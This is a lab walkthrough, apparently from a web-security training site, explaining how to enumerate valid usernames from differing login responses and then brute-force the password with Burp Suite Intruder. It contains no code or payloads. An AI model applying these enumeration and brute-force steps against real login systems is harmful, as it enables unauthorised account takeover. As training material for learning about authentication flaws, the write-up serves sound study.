Username enumeration via different responses

PreviousAuthentication Next2FA simple bypass

Last updated 6 months ago

Was this helpful?

Username enumeration via different responses

Lab description

Solution

The first step is to capture the login request using an interception with Burp Suite. As shown in the request, there are two parameters: username and password.

Step 2: Enumerating the Username

Send the Intercepted Request to Intruder: In Burp Suite, send the captured request to Intruder. Clear all the selected positions and mark only the username field as a payload position.
Configure Payloads: In the Payloads tab, paste the provided list of usernames.
Start the Attack: Initiate the attack to test each username.

Step 3: Identifying the Valid Username

Analyze the Responses: After the attack is completed, look at the response lengths.
- One of the usernames will have a different response length compared to the others.
- Upon reviewing the rendered page, this username will also display a different error message, confirming it as valid.

Upon getting the correct Username, we proceed to brute force the passwords as follows

Step 4: Brute-Forcing the Password

Set Up the Password Attack: Repeat the same process, but this time mark the password field as the payload position. Use the provided password list as payloads.
Start the Attack: Launch the attack to test each password.

Step 5: Identifying the Correct Password

Analyze the Responses: Once the attack is complete, look for a response with:
- A different length from the others.
- A status code 302 or a success message in the response, indicating a successful login.
Result:
- The username and password pair is now verified, and you can use them to access the account.